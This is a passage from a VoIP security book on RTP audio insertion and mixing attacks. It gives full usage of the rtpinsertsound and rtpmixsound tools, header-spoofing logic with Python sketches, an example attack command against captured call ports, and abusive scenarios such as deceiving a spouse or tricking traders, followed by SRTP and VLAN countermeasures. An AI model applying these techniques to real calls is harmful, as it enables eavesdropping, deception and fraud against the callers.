We introduced RTP in Chapter 3. RTP is universally used in VoIP and SIP systems to carry the media. We are not aware of any enterprise VoIP system that does not use RTP. RTP always rides on top of UDP. It doesn't make sense to use TCP, because it would add too much overhead and features such as retransmission of packets don't make sense for real-time data. Attacks against RTP are particularly nasty because they are simple and applicable in virtually any VoIP or SIP environment.
The time period over which audio is sampled and the rate at which RTP packets are transmitted are determined by the codec. The transmission rate is fixed. Whether those packets actually arrive at a fixed rate at the receiving endpoint depends on the performance of the intervening network infrastructure and on competition with other network traffic. RTP packets might be lost en route, might arrive at the receiving endpoint out of sequence, or might even be duplicated as they transit the network. Consequently, receiving endpoints are designed with the presumption that packets composing the audio stream will not arrive at the precise rate at which they were transmitted. Endpoints incorporate an audio "jitter buffer" and one or more algorithms to manipulate the characteristics of that jitter buffer in an attempt to produce the highest quality audio playback. The jitter buffer keys on RTP header information (for example, the sequence number, SSRC, and timestamp) to accomplish its function. If an attacker is in a position to spoof those RTP header fields (and perhaps the fields of lower-layer protocol headers), he can trick a receiving endpoint into rejecting RTP messages from the legitimate endpoint in favor of the audio carried by the RTP messages impersonating legitimate packets.
The G.711 codec is the most commonly used codec, so we chose to concentrate first on attacking RTP media streams carrying G.711 payloads. Later generations of our tools may support additional codecs. G.711 has two flavors: u-law (pronounced mu-law) and a-law. u-law is popular in North America and Japan, whereas a-law is popular in Europe. At the time of this writing, the tools support only G.711 u-law-encoded audio.
G.711 u-law-encoded audio is carried as a 160-byte payload within an RTP message. RTP messages are transmitted within UDP packets at a 50 Hz rate (in other words, every 20 ms). The sequence number field within the RTP header begins at some random number and increases by 1 with each RTP packet transmitted. For G.711, the timestamp begins at some random number and increases by 160 with each RTP packet transmitted. The SSRC is assigned a random number and remains fixed for the session. A SIP re-INVITE message could result in an endpoint or audio codec change, in which case the RTP header values are reinitialized and other protocol-layer values on which the tools depend (for example, IP addresses and UDP port numbers) may also change. At the time of this writing, the tools only support the minimum 12-byte RTP header and don't automatically detect and compensate for audio session modifications.
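The header behavior described above can be sketched in a few lines of Python. This is only an illustration, not the tools' source code: the function names are hypothetical, and the wrap-around masking reflects the 16-bit and 32-bit widths of the sequence number and timestamp fields in a standard RTP header. Payload type 0 is the static RTP payload type for PCMU (G.711 u-law).

```python
import struct

# Minimum 12-byte RTP header: V/P/X/CC byte, M/PT byte,
# 16-bit sequence number, 32-bit timestamp, 32-bit SSRC (network byte order).
RTP_HEADER = struct.Struct("!BBHII")
SAMPLES_PER_PACKET = 160  # 20 ms of 8 kHz G.711 audio, one byte per sample


def pack_rtp_header(seq, timestamp, ssrc, payload_type=0, marker=False):
    """Build a minimum RTP header (version 2, no padding, extension, or CSRCs)."""
    byte0 = 2 << 6  # version = 2, P = 0, X = 0, CC = 0
    byte1 = (int(marker) << 7) | (payload_type & 0x7F)
    return RTP_HEADER.pack(byte0, byte1, seq & 0xFFFF,
                           timestamp & 0xFFFFFFFF, ssrc & 0xFFFFFFFF)


def unpack_rtp_header(data):
    """Parse the first 12 bytes of an RTP message into a dictionary."""
    byte0, byte1, seq, timestamp, ssrc = RTP_HEADER.unpack_from(data)
    return {
        "version": byte0 >> 6,
        "marker": bool(byte1 >> 7),
        "payload_type": byte1 & 0x7F,
        "seq": seq,
        "timestamp": timestamp,
        "ssrc": ssrc,
    }


def next_header_values(seq, timestamp):
    """Advance sequence number by 1 and timestamp by 160, wrapping at field width."""
    return (seq + 1) & 0xFFFF, (timestamp + SAMPLES_PER_PACKET) & 0xFFFFFFFF


header = pack_rtp_header(seq=65535, timestamp=1000, ssrc=0x12345678)
fields = unpack_rtp_header(header)
```

The SSRC is passed through unchanged from packet to packet, which matches the description of it staying fixed for the session.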
One attack is to insert or mix in new audio into an active conversation. The idea here is that one or both parties hear noise, words, or some other sound. Inserting audio causes the real audio to be overwritten. Mixing audio causes the new sounds to be added or merged in. If the new sound has a low volume, the listener will interpret it to be background noise. Figure 13-7 illustrates this attack.
The tools we developed to demonstrate this attack are described next.
The rtpinsertsound and rtpmixsound tools are Linux-based command-line tools. The usage information for the two tools is the same:
./<tool name> EthernetInterface TargetSourceIP TargetSourcePort
              TargetDestinationIP TargetDestinationPort SoundFilename
              -f SpoofFactor -j JitterFactor -h -v

Mandatory parameters:
  EthernetInterface      The Ethernet interface to write to.
  TargetSourceIP         An IPv4 address in dotted notation.
  TargetSourcePort       The UDP port from which the targeted audio stream
                         is being transmitted.
  TargetDestinationIP    An IPv4 address in dotted notation.
  TargetDestinationPort  The UDP port where the audio stream is being received.
  SoundFilename          Contains the audio to mix or insert into the target
                         audio stream. If this file has a .wav extension, the
                         tool assumes it is a WAVE file. Otherwise, it is
                         assumed to be a tcpdump-formatted file, containing
                         raw RTP/UDP/IP/Ethernet packets.

Optional parameters:
  -f SpoofFactor         Range of SpoofFactor is: -1000 to 1000, default = 2
                         when this option is not present on the command line.
  -j JitterFactor        Range of JitterFactor is: 0 to 80, default = 80
                         when this option is not present on the command line.
  -h                     Help: prints the command line usage.
  -v                     Verbose: verbose output.
The rtpinsertsound tool inserts/replaces RTP audio messages representing the playback of the prerecorded bogus audio into the target audio stream. The rtpmixsound tool also inserts/replaces RTP audio messages into the target audio stream, but each message is the real-time mixture of the most recently received legitimate RTP message's audio payload and the next bogus prerecorded RTP message's audio payload.
The sound (in other words, the audio) to insert or mix into an audio stream must be in a .wav (WAVE) or tcpdump-formatted file specified to a tool on its command line, as shown previously. We performed tests using a variety of .wav files we pulled off the Internet. The tcpdump file must be composed of sequential RTP/UDP/IP/Ethernet messages, where the RTP payloads are encoded using the G.711 u-law codec (PCMU). For our tests, we produced these sound files using the Asterisk open-source IP PBX. We wrote Asterisk "call files" to call a VoIP phone and play back the content of the .wav or .gsm file specified by the call file. We then used Wireshark to observe that the audio session negotiation resulted in the G.711 u-law codec being selected for transmission of audio from the Asterisk IP PBX to the VoIP phone, and we captured those RTP packets using Wireshark. You can use Wireshark post-capture filtering to display only the downstream (in other words, Asterisk IP PBX to VoIP phone) RTP packets. You then have the option of saving only the displayed packets to a tcpdump file.
Each tool reads the prerecorded audio from the file specified on its command line into memory before attempting to insert or mix that prerecorded audio into the targeted audio stream. For a tcpdump file, the Ethernet, IP, and UDP layer protocol headers are stripped off each packet as it is loaded into memory. Each tool enforces an arbitrary limit of 30 seconds of prerecorded audio. Audio in excess of the 30-second playback limit is ignored. A G.711 u-law codec audio stream of 30 seconds consumes approximately 252KB of memory (30 sec * 50 RTP messages/sec * 172 bytes/message = 258,000 bytes, where each message is a 12-byte RTP header plus a 160-byte payload), a modest amount by today's standards. The prerecorded audio is memory resident to avoid the delays that might otherwise be required to obtain it from a mechanical medium in real time while the tool attempts to mix or insert it into the target audio stream.
Each tool requires the ability to monitor the call to be attacked. This is necessary to spoof the inserted or mixed audio. Because neither tool presumes an MITM position, it's assumed that the receiving VoIP endpoint is going to receive both the legitimate audio stream and the bogus audio stream. This represents twice the number of audio packets the receiving endpoint expects. Both tools employ several techniques to trick the receiving VoIP endpoint into using the bogus audio, rather than the legitimate audio:
Spoofing the RTP protocol header sequence number: SpoofFactor is added to the value of the sequence number in the RTP protocol header of a newly received packet bearing a legitimate RTP message. The new value is written into the RTP protocol header of the next packet transmitted by the tool.
Spoofing the RTP protocol header timestamp: SpoofFactor is multiplied by 160 and added to the timestamp in the RTP protocol header of a newly received packet bearing a legitimate RTP message. The new value is written into the RTP protocol header of the next packet transmitted by the tool.
Spoofing the RTP protocol header synchronization source identification: The value of SSRC in the RTP protocol header of a newly received packet bearing a legitimate RTP message is copied into the RTP protocol header of the next packet transmitted by the tool.
Spoofing the UDP protocol header source port: The source port in the UDP protocol header in packets transmitted by the tool is set equal to TargetSourcePort.
Spoofing the UDP protocol header destination port: The destination port in the UDP protocol header in packets transmitted by the tool is set equal to TargetDestinationPort.
Spoofing the IP protocol header source IP address: The value of the source IP address in the IP protocol header in packets transmitted by the tool is set equal to TargetSourceIP.
Spoofing the IP protocol header identification: SpoofFactor is added to the value of the identification field in the IP protocol header of a newly received packet bearing a legitimate RTP message. The new value is written into the IP protocol header of the next packet transmitted by the tool.
Spoofing the Ethernet protocol header source MAC address: The value of the source MAC address in the Ethernet protocol header in packets bearing legitimate RTP messages from the target audio stream is copied into the source MAC address of the Ethernet protocol header of the next packet transmitted by the tool.
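The arithmetic behind the SpoofFactor-driven fields in the list above can be sketched as follows. This is a minimal illustration rather than the tools' actual code: the function name and dictionary keys are hypothetical, and the masking that wraps values at the 16-bit and 32-bit field widths is an assumption, since the text does not say how the tools handle overflow.

```python
TIMESTAMP_STEP = 160  # G.711 timestamp increment per RTP packet


def spoof_header_values(legit, spoof_factor=2):
    """Derive header values for the next bogus packet.

    `legit` holds fields read from the most recently received legitimate
    packet: rtp_seq, rtp_timestamp, rtp_ssrc, and ip_id (hypothetical keys).
    """
    return {
        # Sequence number: legitimate value plus SpoofFactor (16-bit field).
        "rtp_seq": (legit["rtp_seq"] + spoof_factor) & 0xFFFF,
        # Timestamp: legitimate value plus SpoofFactor * 160 (32-bit field).
        "rtp_timestamp": (legit["rtp_timestamp"]
                          + spoof_factor * TIMESTAMP_STEP) & 0xFFFFFFFF,
        # SSRC: copied unchanged.
        "rtp_ssrc": legit["rtp_ssrc"],
        # IP identification: legitimate value plus SpoofFactor (16-bit field).
        "ip_id": (legit["ip_id"] + spoof_factor) & 0xFFFF,
    }


observed = {"rtp_seq": 65535, "rtp_timestamp": 1000,
            "rtp_ssrc": 0xDEADBEEF, "ip_id": 10}
bogus = spoof_header_values(observed, spoof_factor=2)
```

With the default SpoofFactor of 2, the bogus packet carries header values two packets ahead of the legitimate packet that triggered it.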
The reception of a (presumably) legitimate audio packet from the transmitting VoIP endpoint drives the tool to output the next bogus RTP message based on its prerecorded, memory-resident audio. In the case of the rtpmixsound tool, the prerecorded audio is converted from 8-bit, nonlinear G.711 PCMU to 16-bit linear PCM when it is loaded into memory. A G.711 u-law datum can't be added directly to another G.711 u-law datum (well, you can, but you won't achieve the desired result). Each 8-bit, nonlinear G.711 u-law audio byte in the incoming RTP payload must first be converted to a 16-bit linear PCM value, then added to the corresponding 16-bit linear PCM value of the prerecorded, preconverted audio, and finally transformed back into an 8-bit G.711 u-law datum.
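The convert, add, and re-encode sequence can be illustrated with a short Python sketch. It uses a widely circulated formulation of G.711 u-law companding (bias of 0x84, clip at 32635) rather than anything taken from rtpmixsound itself. The function names are hypothetical, and clamping the sum to the signed 16-bit range is an assumption about how overflow might be handled.

```python
BIAS = 0x84    # bias added before locating the segment
CLIP = 32635   # largest magnitude that can be encoded after biasing


def ulaw_to_linear(byte):
    """Decode one 8-bit G.711 u-law byte to a 16-bit linear PCM value."""
    u = ~byte & 0xFF
    t = (((u & 0x0F) << 3) + BIAS) << ((u & 0x70) >> 4)
    return BIAS - t if u & 0x80 else t - BIAS


def linear_to_ulaw(sample):
    """Encode a 16-bit linear PCM value as one G.711 u-law byte."""
    sign = 0x80 if sample < 0 else 0
    magnitude = min(abs(sample), CLIP) + BIAS
    exponent, mask = 7, 0x4000
    while exponent > 0 and not (magnitude & mask):
        exponent -= 1
        mask >>= 1
    mantissa = (magnitude >> (exponent + 3)) & 0x0F
    return ~(sign | (exponent << 4) | mantissa) & 0xFF


def mix_payload(legit_payload, prerecorded_pcm):
    """Mix a legitimate u-law payload with preconverted linear PCM samples."""
    mixed = bytearray(len(legit_payload))
    for i, byte in enumerate(legit_payload):
        total = ulaw_to_linear(byte) + prerecorded_pcm[i]
        total = max(-32768, min(32767, total))  # assumed overflow handling
        mixed[i] = linear_to_ulaw(total)
    return bytes(mixed)


# Prerecorded audio is converted to linear PCM once, when it is loaded.
prerecorded = [ulaw_to_linear(b) for b in b"\x00\x45\x9a\xff"]
# Mixing with u-law silence (0xFF decodes to 0) returns the prerecorded audio.
result = mix_payload(b"\xff\xff\xff\xff", prerecorded)
```

Adding the raw u-law bytes instead would sum logarithmically compressed codes, which is why the text says it won't achieve the desired result.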
The JitterFactor comes into play when determining when to transmit a packet. The JitterFactor is entered as a percentage of the target audio stream's transmission interval. The transmission interval using the G.711 codec is 20 ms. For example, a JitterFactor = 10 means (10% * 20 ms) = 2 ms. This means the bogus audio packet won't be output until about 2 ms prior to the time the next legitimate audio packet is expected to be received. The range is 0 to 80 percent. A value of 80 percent, the default, essentially means to output the bogus packet as soon as possible following the reception of the legitimate audio packet triggering the bogus output. Do not enter a value too close to 0 because the timing is not extremely accurate and you take the risk that the receiving VoIP endpoint gets the next legitimate RTP packet before the bogus RTP packet. Output of bogus packets by the tool is close-looped with the reception of legitimate audio packets from the target audio stream. At the time of this writing, the tool freezes if legitimate audio packets in the target stream are no longer received while prerecorded audio remains to be inserted (or mixed and inserted) into the target audio stream.
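The JitterFactor arithmetic can be expressed as a small calculation. The sketch below is one reading of the description above, with a hypothetical function name: it converts the percentage into a lead time before the next expected legitimate packet, then subtracts that from the 20 ms transmission interval to get the delay after the triggering packet. How the actual tools schedule output, particularly at the default of 80, may differ.

```python
def bogus_send_delay_ms(jitter_factor=80, interval_ms=20.0):
    """Return how long to wait after a legitimate packet before sending.

    jitter_factor is a percentage (0 to 80) of the transmission interval,
    interpreted as the lead time before the next legitimate packet.
    """
    if not 0 <= jitter_factor <= 80:
        raise ValueError("JitterFactor must be between 0 and 80")
    lead_ms = interval_ms * jitter_factor / 100.0
    return interval_ms - lead_ms


delay_for_10 = bogus_send_delay_ms(10)   # 2 ms lead time, 18 ms delay
delay_for_80 = bogus_send_delay_ms(80)   # 16 ms lead time, 4 ms delay
```

Under this reading, small JitterFactor values push the bogus packet close to the arrival of the next legitimate one, which is the risk the text warns about.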
Why is a JitterFactor even needed? We have discovered that at least one of our VoIP phones is sensitive to when the bogus audio packet is received relative to the next legitimate audio packet. If the next bogus packet is output by the tool as soon as possible following the reception of a legitimate packet (say within a couple of hundred usec), the Snom 190 SIP phone seems to reject it in favor of the following legitimate audio packet received about 20 ms later. However, if we delay the output of the bogus packet until a few milliseconds prior to the time-of-day the next legitimate packet is expected to be received, then the Snom 190 phone accepts the bogus audio packet and appears to reject the next legitimate audio packet received a few milliseconds later. The Grandstream BT-100 SIP phone and the Avaya 4602 IP phone (with a SIP load) were not sensitive to when the bogus packet was received within the transmission interval. The default JitterFactor = 80 (in other words, as soon as possible) was fine for those phones.
While a negative SpoofFactor can be entered, so far we've only observed successful spoofing with positive SpoofFactor entries. Though the default value for the SpoofFactor parameter is 2, usually a value of 1 is adequate. Higher values have also been successful (for example, 10 or 20). The phones we've been successful in spoofing appear to prefer audio packets with the more advanced RTP header and IP header values.
It should be apparent at this point that only one side of the call is affected by each tool. The person on the receiving end of the target audio stream hears the inserted/mixed audio. The person on the transmitting end of the target audio stream is oblivious until the person on the receiving end of the target audio stream begins to inquire what the heck is going on. The VoIP phones we've successfully targeted with the rtpinsertsound tool play the inserted audio. The legitimate audio is effectively muted. So, if the person on the receiving end of the bogus audio begins to question what is going on, the person on the transmitting end will hear him, but the receiving end won't be able to hear the reply of the person on the transmitting end until the playback of the bogus audio is complete. The advantage of the rtpmixsound tool is that the person on the target receiving end is able to hear the person on the target transmitting end continue to speak throughout the playback of the bogus prerecorded audio.
A compilation directive determines whether the object code of a tool is produced with Ethernet layer spoofing or whether IP layer spoofing is sufficient. Our testing to date has demonstrated that Ethernet layer spoofing is not required. The tool executes faster when it is not required to spoof at the Ethernet layer.
To use either tool, you first need access to the network segment where the call is being transmitted. For the following example, we called extension 3000 from extension 3500. As the call was being set up, we used Wireshark to monitor the signaling to gather the UDP ports. We, of course, knew the IP addresses. An example of where to find the UDP ports in the SIP INVITE request and 200 OK response is as follows:
Request-Line: INVITE sip:3000@ser_proxy SIP/2.0
    Method: INVITE
    Resent Packet: False
Message Header
    Via: SIP/2.0/UDP 10.1.101.35;branch=z9hG4bKd3eb18e03c927842
    From: "GS 2" <sip:3500@ser_proxy>;tag=6a81db91b12d3fac
    To: <sip:3000@ser_proxy>
    Contact: <sip:firstname.lastname@example.org>
    Supported: replaces
    Call-ID: email@example.com
    CSeq: 6891 INVITE
    User-Agent: Grandstream BT110 22.214.171.124
    Max-Forwards: 70
    Allow: INVITE,ACK,CANCEL,BYE,NOTIFY,REFER,OPTIONS,INFO,SUBSCRIBE
    Content-Type: application/sdp
    Content-Length: 384
Message body
    Session Description Protocol
        Session Description Protocol Version (v): 0
        Owner/Creator, Session Id (o): 3500 8000 8000 IN IP4 10.1.101.35
        Session Name (s): SIP Call
        Connection Information (c): IN IP4 10.1.101.35
        Time Description, active time (t): 0 0
        Media Description, name and address (m): audio 5004 RTP/AVP 0 8 4 18 2 9 111 125

Session Initiation Protocol
Status-Line: SIP/2.0 200 Ok
    Status-Code: 200
    Resent Packet: False
Message Header
    Via: SIP/2.0/UDP ser_proxy;branch=z9hG4bKa73e.301b21f1.0
    Via: SIP/2.0/UDP 10.1.101.35;branch=z9hG4bKd3eb18e03c927842
    Record-Route: <sip:ser_proxy;ftag=6a81db91b12d3fac;lr=on>
    From: "GS 2" <sip:3500@ser_proxy>;tag=6a81db91b12d3fac
    To: <sip:3000@ser_proxy>;tag=75jmhn8jwu
    Call-ID: firstname.lastname@example.org
    CSeq: 6891 INVITE
    Contact: <sip:email@example.com:2051;line=xuahyhk7>
    User-Agent: snom190/3.60x
    Allow: INVITE, ACK, CANCEL, BYE, REFER, OPTIONS, NOTIFY, SUBSCRIBE, PRACK, MESSAGE, INFO
    Allow-Events: talk, hold, refer
    Supported: timer, 100rel, replaces
    Content-Type: application/sdp
    Content-Length: 218
Message body
    Session Description Protocol
        Session Description Protocol Version (v): 0
        Owner/Creator, Session Id (o): root 1711562323 1711562324 IN IP4 10.1.101.30
        Session Name (s): call
        Connection Information (c): IN IP4 10.1.101.30
        Time Description, active time (t): 0 0
        Media Description, name and address (m): audio 60722 RTP/AVP 0 125
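If you have the raw SDP bodies rather than a Wireshark dissection, the same address and port information can be pulled out programmatically. The following Python sketch is a simplified illustration with a hypothetical function name: it reads only the first connection (c=) line and the first audio media (m=) line, and the raw SDP strings are reconstructed from the field values shown in the example above.

```python
def media_endpoint(sdp_text):
    """Return (ip_address, udp_port) for the first audio stream in an SDP body."""
    ip_address = None
    port = None
    for line in sdp_text.splitlines():
        line = line.strip()
        if line.startswith("c=") and ip_address is None:
            # c=<network type> <address type> <connection address>
            ip_address = line[2:].split()[2]
        elif line.startswith("m=audio") and port is None:
            # m=audio <port> <transport> <payload types...>
            port = int(line.split()[1])
    return ip_address, port


# Raw SDP reconstructed from the INVITE and 200 OK values shown above.
invite_sdp = (
    "v=0\r\n"
    "o=3500 8000 8000 IN IP4 10.1.101.35\r\n"
    "s=SIP Call\r\n"
    "c=IN IP4 10.1.101.35\r\n"
    "t=0 0\r\n"
    "m=audio 5004 RTP/AVP 0 8 4 18 2 9 111 125\r\n"
)
ok_sdp = (
    "v=0\r\n"
    "o=root 1711562323 1711562324 IN IP4 10.1.101.30\r\n"
    "s=call\r\n"
    "c=IN IP4 10.1.101.30\r\n"
    "t=0 0\r\n"
    "m=audio 60722 RTP/AVP 0 125\r\n"
)

caller = media_endpoint(invite_sdp)   # where extension 3500 receives audio
callee = media_endpoint(ok_sdp)       # where extension 3000 receives audio
```

Each SDP body advertises where that endpoint expects to receive audio, so the INVITE supplies the address and port for extension 3500 and the 200 OK supplies them for extension 3000.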
Note that the tools work equally well in non-SIP environments. We tested them with both Cisco SCCP and Avaya H.323 IP phones. Of course, in these environments, you will have to look at different messages to identify the media ports. Another easy way to get the ports is to use Wireshark to look at the actual RTP streams. Each RTP packet is built on top of UDP and IP, so you can collect the IP addresses and ports from packets flowing in the direction you want to attack. Remember that the tool inserts/mixes audio in only one direction.
An example command invocation for this attack is as follows:
./rtpmixsound eth0 10.1.101.35 5004 10.1.101.30 60722 sound_to_mix
This command mixes the contents of the file sound_to_mix into the RTP stream transmitted from extension 3500 (IP address 10.1.101.35, UDP port 5004) to extension 3000 (IP address 10.1.101.30, UDP port 60722).
You can run multiple copies of the tools to affect multiple calls. You can also use two invocations of the tools to affect both sides of a call. Finally, you can place these commands in a script, with a delay, if you would like to repeatedly insert or mix in a short sound, such as a word or noise.
These tools enable many types of attacks. All of them follow the same basic format, but with different audio to be inserted or mixed in. A few examples that come to mind include the following:
For any calls, insert or mix in background noise to make the call quality sound poor.
For any call, insert or mix in derogatory language, making the target think they are being abused.
For a call to a spouse, mix in background sounds from a gentlemen's club, poker game, or something else the person should not be doing.
For a customer support call, mix in abusive phrases, making the customer think they are being insulted.
For trading, insert words such as "buy" or "sell" to see if the customer can be tricked into making the wrong transaction.
If you are at home goofing off, mix in office sounds.
Because you are observing the target RTP stream, you can also listen to it and "time" execution of the command. In other words, you can listen and wait for the right time and then run a command that inserts a word or phrase at an exact moment. The tool runs and starts up quickly enough to allow this. Keep in mind that you can run multiple copies of these tools, so if you have access to a portion of the network carrying many calls, you can affect any and all of them. This includes calls being transmitted to the media gateway and over the wide area network (WAN).
These attacks can irritate, insult, and confuse the target. Certain attacks could seriously undermine the credibility of individuals or enterprises. Attacks that add noise could make users think the VoIP system is not performing well.
These attacks target RTP, which is used in virtually all VoIP environments, including those using proprietary signaling protocols. For these attacks to take place, the attacker needs access to your internal network. These attacks are also possible from an external network if you send RTP over the Internet or some other public voice network.
You can employ several countermeasures to address these RTP manipulation attacks. These are described next.
You can stop RTP manipulation attacks to some degree by encrypting the audio. If the audio is encrypted, it is impossible to read in the audio and mix in new sounds. You can insert new audio, but even if the target can be tricked into accepting it, it will sound like noise when you decrypt it. Even this would only be possible if the RTP packets are not authenticated. Most enterprise-class VoIP products offer RTP encryption as an option. Unfortunately, it is still rarely used.
Secure RTP (SRTP), http://www.ietf.org/rfc/rfc3711.txt, is a standard providing encryption and authentication of RTP (and RTCP). SRTP provides strong encryption for privacy (which prevents mixing) and optional authentication that allows endpoints to differentiate legitimate from bogus RTP packets. A substantial number of vendors support SRTP as an option, but again, it is rarely implemented. ZRTP, promoted by Phil Zimmermann of PGP fame, is another option for encrypting RTP streams.
Most enterprise-class SIP systems use VLANs to separate voice and data. While VLANs are designed primarily to assist with performance, they also provide a layer of separation and security. With VLANs and properly configured LAN switches, you can make it more difficult for a PC to monitor and insert bogus RTP packets.
The use of softphones on PCs can defeat the use of VLANs as a security measure. When a softphone is used, RTP packets, presumably from the softphone, must be accepted by the network.
The rtpinsertsound and rtpmixsound tools support VLANs. If compiled to do so, they will write packets with the correct VLAN and QoS values.
It isn't practical to place a VoIP/SIP firewall "in front" of all the VoIP phones. A VoIP/SIP firewall should, however, be used when VoIP is exchanged with a public network. A VoIP/SIP firewall can monitor incoming and outgoing RTP and detect audio insertion/mixing attacks. VoIP/SIP firewalls are available from several vendors, including SecureLogix (http://www.securelogix.com), Sipera (http://www.sipera.com), Borderware (http://www.borderware.com), and Ingate (http://www.ingate.com). Some traditional firewalls, Intrusion Detection Systems (IDS), and Intrusion Prevention Systems (IPS) also provide support for VoIP and RTP.